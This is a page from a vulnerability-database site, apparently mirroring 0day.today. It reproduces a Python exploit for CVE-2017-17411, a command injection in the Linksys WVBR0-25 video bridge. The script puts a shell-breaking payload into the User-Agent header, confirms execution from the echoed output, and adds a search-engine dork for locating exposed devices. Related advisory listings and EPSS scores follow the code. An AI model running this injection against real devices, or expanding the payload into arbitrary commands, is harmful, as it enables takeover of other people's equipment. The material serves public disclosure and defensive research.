Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtNixawk1337DAY-ID-29254
HistoryDec 19, 2017 - 12:00 a.m.

Linksys WVBR0 - User-Agent Remote Command Injection Exploit

2017-12-1900:00:00
nixawk
0day.today
125

0.974 High

EPSS

Percentile

99.9%

JSON

Exploit for hardware platform in category web applications

# -*- coding: utf-8 -*- 
  
 # Author: Nixawk 
 # CVE-2017-17411 
 # Linksys WVBR0 25 Command Injection 
  
 """ 
 $ python2.7 exploit-CVE-2017-17411.py 
 [*] Usage: python exploit-CVE-2017-17411.py <URL> 
  
 $ python2.7 exploit-CVE-2017-17411.py http://example.com/ 
 [+] Target is exploitable by CVE-2017-17411 
 """ 
  
 import requests 
  
  
 def check(url): 
     payload = '"; echo "admin' 
     md5hash = "456b7016a916a4b178dd72b947c152b7"  # echo "admin" | md5sum 
  
     resp = send_http_request(url, payload) 
  
     if not resp: 
         return False 
  
     lines = resp.text.splitlines() 
     sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines) 
  
     if not any([payload in sys_cmd for sys_cmd in sys_cmds]): 
         return False 
  
     if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]): 
         return False 
  
     print("[+] Target is exploitable by CVE-2017-17411 ") 
     return True 
  
  
 def send_http_request(url, payload): 
     headers = { 
         'User-Agent': payload 
     } 
  
     response = None 
     try: 
         response = requests.get(url, headers=headers) 
     except Exception as err: 
         log.exception(err) 
  
     return response 
  
  
 if __name__ == '__main__': 
     import sys 
  
     if len(sys.argv) != 2: 
         print("[*] Usage: python %s <URL>" % sys.argv[0]) 
         sys.exit(0) 
  
     check(sys.argv[1]) 
  
  
 # google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US" 
  
 ## References 
  
 # https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair 
 # https://thehackernews.com/2017/12/directv-wvb-hack.html

#  0day.today [2018-04-05]  #

Related

exploitpack 1
nvd 1
zdt 1
cve 1
openvas 1
packetstorm 1
cvelist 1
zdi 1
seebug 1
checkpoint_advisories 1
prion 1
exploitdb 1
exploitpack
exploitpack
Linksys WVBR0 - User-Agent Remote Command Injection
2017-12-14 00:00:00
nvd
nvd
CVE-2017-17411
2017-12-21 14:29:00
zdt
zdt
Linksys WVBR0-25 User-Agent Command Execution Exploit
2018-01-04 00:00:00
cve
cve
CVE-2017-17411
2017-12-21 14:29:00
openvas
openvas
Linksys WVBRO25 RCE Vulnerability
2017-12-22 00:00:00
packetstorm
packetstorm
Linksys WVBR0-25 User-Agent Command Execution
2018-01-04 00:00:00
cvelist
cvelist
CVE-2017-17411
2017-12-21 14:00:00
zdi
zdi
(0Day) Linksys WVBR0 User-Agent Command Injection Remote Code Execution Vulnerability
2017-12-18 00:00:00
seebug
seebug
Linksys WVBR0 25 Command Injection(CVE-2017-17411)
2017-12-15 00:00:00
checkpoint_advisories
checkpoint_advisories
Linksys WVBR0-25 Command Injection (CVE-2017-17411)
2018-05-28 00:00:00
prion
prion
Design/Logic Flaw
2017-12-21 14:29:00
exploitdb
exploitdb
Linksys WVBR0 - &#039;User-Agent&#039; Remote Command Injection
2017-12-14 00:00:00

0.974 High

EPSS

Percentile

99.9%

JSON
Related for 1337DAY-ID-29254
exploitpack1nvd1zdt1cve1openvas1packetstorm1cvelist1zdi1seebug1checkpoint_advisories1prion1exploitdb1